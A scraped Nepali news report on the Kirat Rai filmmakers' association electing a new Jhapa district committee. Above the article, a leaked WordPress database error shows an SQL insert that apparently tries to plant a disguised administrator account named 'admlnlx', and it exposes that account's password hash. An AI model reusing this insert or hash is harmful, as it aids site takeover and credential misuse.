WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BERZYITqjWsmbQ6YdLDNExE1zSnRDw1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 21:30:18', '', 'admlnlx', 'admlnlx')
काठमाण्डौं । किरात राई चलचित्रकर्मी संघ जिल्ला कार्यसमिति झापाकोे दोस्रो साधारण सभा सम्पन्न भएको छ ।
नयाँ कार्यसमिति चयन गर्दै संघले शनिबार बिर्तामोडको होटल हिकोला हेरिटेजमा साधारण सभा सम्पन्न गरेको हो ।
साधारण सभाले श्यामबहादुर राइको अध्यक्षतामा १३ सदस्य नयाँ जिल्ला कार्यसमिति चयन गरेको छ । दुई उपाध्यक्ष ससिता राई र मिलन बान्तावा राई, महासचिव सुनिता तामाङ राई, सचिव एलिना राई, कोषाध्यक्ष रविकिरण बान्तावा राईका साथै सदस्यहरु जिमीहाङ राई, मेरी राई, यमुना राई, प्रविन राई, विकास राई, समिता राई र आषिस राई सर्वसहमत चयन हुनुभएको छ ।
संघ झापाका निवर्तमान अध्यक्ष भुवनसिंह राईको सभापतित्वमा सम्पन्न कार्यक्रमले विगत वर्षमा गरिएका किरात राईको लघु चलचित्र नागा, जनजाति चलचित्र लुङा जस्ता चलचित्रको निर्माण र आदिवासी जनजाती चलचित्र अन्तरक्रिया कार्यक्रम जस्ता थुप्रै कार्यक्रमको आयोजना गरिएको जानकारी गराउनु भएको थियो ।
प्रमुख अथिति किरात राई चलचित्रकर्मी संघका केन्द्रिय अध्यक्ष केशव राई ९युप्श० ले यस संस्थाका उदेश्य र भावि योजनाको विषयमा प्रष्ट पार्नुभएको थियो ।
नेपालमा रहेका हरेक आदिवासी जनजातिको संस्कार, संस्कृति र भाषा नेपालको गहना रहेको उहाँले जानकारी दिनुभयो ।
अझै यस संस्थाले आदिवासी जनजाति समुदायको संस्कार र सस्कृतिमा बनेका चलचित्रहरु प्रति राज्यको ध्यानाकर्षन गराउनु यस संस्थाको जिम्मेवारी रहेको बताए ।